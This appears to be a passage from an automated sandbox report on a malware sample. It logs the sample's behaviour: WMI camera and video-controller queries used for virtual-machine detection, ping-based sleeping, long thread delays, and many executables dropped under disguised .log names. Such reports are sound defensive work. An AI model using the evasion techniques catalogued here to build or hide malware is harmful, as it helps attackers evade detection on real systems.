                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Uses ping.exe to sleep
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeMemory allocated: 1550000 memory reserve | memory write watchJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeMemory allocated: 1B0C0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeMemory allocated: 11A0000 memory reserve | memory write watch
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeMemory allocated: 1ADA0000 memory reserve | memory write watch
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 600000
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 599874
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 599766
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 599656
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 599537
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 599420
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 599312
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 599195
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 599094
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 3600000
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 598906
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 598266
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 597750
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 597422
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 596891
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 596438
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 596235
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 596016
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 595828
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 595453
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 595125
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 594719
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 594375
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 594030
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 593750
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 593344
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 592985
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 592469
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 592000
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 591422
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 591172
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 590813
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 590467
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 589985
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 589563
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 589313
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 588875
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 300000
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 588563
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 588063
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 587687
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 587094
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 586719
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 586260
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 585915
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 585641
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 585144
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 584933
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 584735
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 584533
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 584375
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 584183
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 583985
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 583849
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 583668
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 583516
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 583328
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 583172
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 582972
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 582735
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 582266
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 582121
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 581938
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 581781
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 581610
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 581422
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 581219
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 581000
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 580765
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 580608
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 580500
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 580391
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 580251
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 580063
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 579735
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 579516
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 579404
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 579288
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 579186
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 579074
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 578922
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 578750
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 578625
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 578512
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 578406
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 578297
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 578182
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 578074
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 577968
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 577846
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 577719
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 577606
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 577489
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 577360
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 577172
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 577031
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 576922
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 576809
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 576703
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 576594
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 576469
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 576324
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 576216
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 576109
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 575998
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 575889
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 575770
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeThread delayed: delay time: 575641
                          Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3515Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3535Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3489
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3392
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3262
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWindow / User API: threadDelayed 7041
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWindow / User API: threadDelayed 2173
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\eRokfvkG.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\cXlUovHQ.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeDropped PE file which has not been started: C:\Users\user\Desktop\fEwcKMUX.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\NKXFMJFr.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeDropped PE file which has not been started: C:\Users\user\Desktop\XpVNKoNn.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeDropped PE file which has not been started: C:\Users\user\Desktop\MJbpFLtL.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\TuQMKFja.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeDropped PE file which has not been started: C:\Users\user\Desktop\EOLhHxkb.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\KCawqqLw.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\DWtPcxKJ.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeDropped PE file which has not been started: C:\Users\user\Desktop\yeGIODyj.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\cPBBKMgL.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\zomqzklW.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeDropped PE file which has not been started: C:\Users\user\Desktop\XXPuwSTl.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\GUTYNdlI.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\kSAcnKQA.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeDropped PE file which has not been started: C:\Users\user\Desktop\yViIeRfn.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\zgCYVAKQ.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeDropped PE file which has not been started: C:\Users\user\Desktop\nzLkJbeH.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\hbKlfOQH.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\QvCVTWQk.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeDropped PE file which has not been started: C:\Users\user\Desktop\IECYOtkU.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\oROSeukq.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\YqSdRlZU.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\PHyNhJUm.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeDropped PE file which has not been started: C:\Users\user\Desktop\OxfxrZpJ.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeDropped PE file which has not been started: C:\Users\user\Desktop\AQlYVRJc.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeDropped PE file which has not been started: C:\Users\user\Desktop\krNbnIjL.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeDropped PE file which has not been started: C:\Users\user\Desktop\TkxwTWEx.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\aeWlDzVS.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeDropped PE file which has not been started: C:\Users\user\Desktop\tahrXlpt.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeDropped PE file which has not been started: C:\Users\user\Desktop\gBXkgMjS.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeDropped PE file which has not been started: C:\Users\user\Desktop\gSeCuhdU.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\ddkcuipI.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeDropped PE file which has not been started: C:\Users\user\Desktop\kOfTBNTO.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\KUhOFMFy.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeDropped PE file which has not been started: C:\Users\user\Desktop\IwSFjKJP.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\HRugjdAD.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeDropped PE file which has not been started: C:\Users\user\Desktop\MBrWacSF.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\PybNxWBp.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeDropped PE file which has not been started: C:\Users\user\Desktop\dBJtpdQc.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeDropped PE file which has not been started: C:\Users\user\Desktop\RfmVTnPw.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\ATGgGOGO.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeDropped PE file which has not been started: C:\Users\user\Desktop\GQyPcgoW.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\kJRJIbpu.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeDropped PE file which has not been started: C:\Users\user\Desktop\EXjhrjDY.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeDropped PE file which has not been started: C:\Users\user\Desktop\HNZYygDR.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\xAiiOWpY.logJump to dropped file
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-23453
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe TID: 7632Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5460Thread sleep count: 3515 > 30Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7104Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7220Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2140Thread sleep count: 3535 > 30Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7352Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5308Thread sleep count: 35 > 30Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5740Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8184Thread sleep count: 3489 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7324Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8032Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8188Thread sleep count: 3392 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7412Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8048Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5012Thread sleep count: 3262 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7364Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4504Thread sleep count: 69 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2416Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 4296Thread sleep time: -30000s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -30437127721620741s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -600000s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -599874s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -599766s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -599656s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -599537s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -599420s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -599312s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -599195s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -599094s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 1836Thread sleep time: -36000000s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -598906s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -598266s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -597750s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -597422s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -596891s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -596438s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -596235s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -596016s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -595828s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -595453s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -595125s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -594719s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -594375s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -594030s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -593750s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -593344s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -592985s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -592469s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -592000s >= -30000s
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exe TID: 7332Thread sleep time: -591422s >= -30000s
